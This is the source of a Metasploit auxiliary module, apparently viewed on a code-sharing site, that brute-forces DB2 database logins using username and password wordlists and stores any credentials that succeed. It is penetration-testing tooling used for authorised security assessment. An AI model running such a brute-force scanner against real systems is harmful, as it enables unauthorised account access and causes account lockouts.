Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/db2/db2_auth.rb
19514 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'metasploit/framework/credential_collection'
7
require 'metasploit/framework/login_scanner/db2'
8
9
class MetasploitModule < Msf::Auxiliary
10
include Msf::Exploit::Remote::DB2
11
include Msf::Auxiliary::AuthBrute
12
include Msf::Auxiliary::Scanner
13
include Msf::Auxiliary::Report
14
15
def initialize
16
super(
17
'Name' => 'DB2 Authentication Brute Force Utility',
18
'Description' => %q{
19
This module attempts to authenticate against a DB2 instance
20
using username and password combinations indicated by the
21
USER_FILE, PASS_FILE, and USERPASS_FILE options.
22
},
23
'Author' => ['todb'],
24
'References' => [
25
[ 'CVE', '1999-0502'] # Weak password
26
],
27
'License' => MSF_LICENSE,
28
'Notes' => {
29
'Stability' => [CRASH_SAFE],
30
'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],
31
'Reliability' => []
32
}
33
)
34
35
register_options(
36
[
37
Opt::Proxies,
38
OptPath.new('USERPASS_FILE', [
39
false, 'File containing (space-separated) users and passwords, one pair per line',
40
File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_userpass.txt')
41
]),
42
OptPath.new('USER_FILE', [
43
false, 'File containing users, one per line',
44
File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_user.txt')
45
]),
46
OptPath.new('PASS_FILE', [
47
false, 'File containing passwords, one per line',
48
File.join(Msf::Config.data_directory, 'wordlists', 'db2_default_pass.txt')
49
]),
50
]
51
)
52
end
53
54
def run_host(ip)
55
cred_collection = build_credential_collection(
56
realm: datastore['DATABASE'],
57
username: datastore['USERNAME'],
58
password: datastore['PASSWORD']
59
)
60
61
scanner = Metasploit::Framework::LoginScanner::DB2.new(
62
configure_login_scanner(
63
host: ip,
64
port: rport,
65
proxies: datastore['PROXIES'],
66
cred_details: cred_collection,
67
stop_on_success: datastore['STOP_ON_SUCCESS'],
68
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
69
connection_timeout: 30,
70
max_send_size: datastore['TCP::max_send_size'],
71
send_delay: datastore['TCP::send_delay'],
72
framework: framework,
73
framework_module: self,
74
ssl: datastore['SSL'],
75
ssl_version: datastore['SSLVersion'],
76
ssl_verify_mode: datastore['SSLVerifyMode'],
77
ssl_cipher: datastore['SSLCipher'],
78
local_port: datastore['CPORT'],
79
local_host: datastore['CHOST']
80
)
81
)
82
83
scanner.scan! do |result|
84
credential_data = result.to_h
85
credential_data.merge!(
86
module_fullname: fullname,
87
workspace_id: myworkspace_id
88
)
89
if result.success?
90
credential_core = create_credential(credential_data)
91
credential_data[:core] = credential_core
92
create_credential_login(credential_data)
93
94
print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
95
else
96
invalidate_login(credential_data)
97
vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
98
end
99
end
100
end
101
end
102
103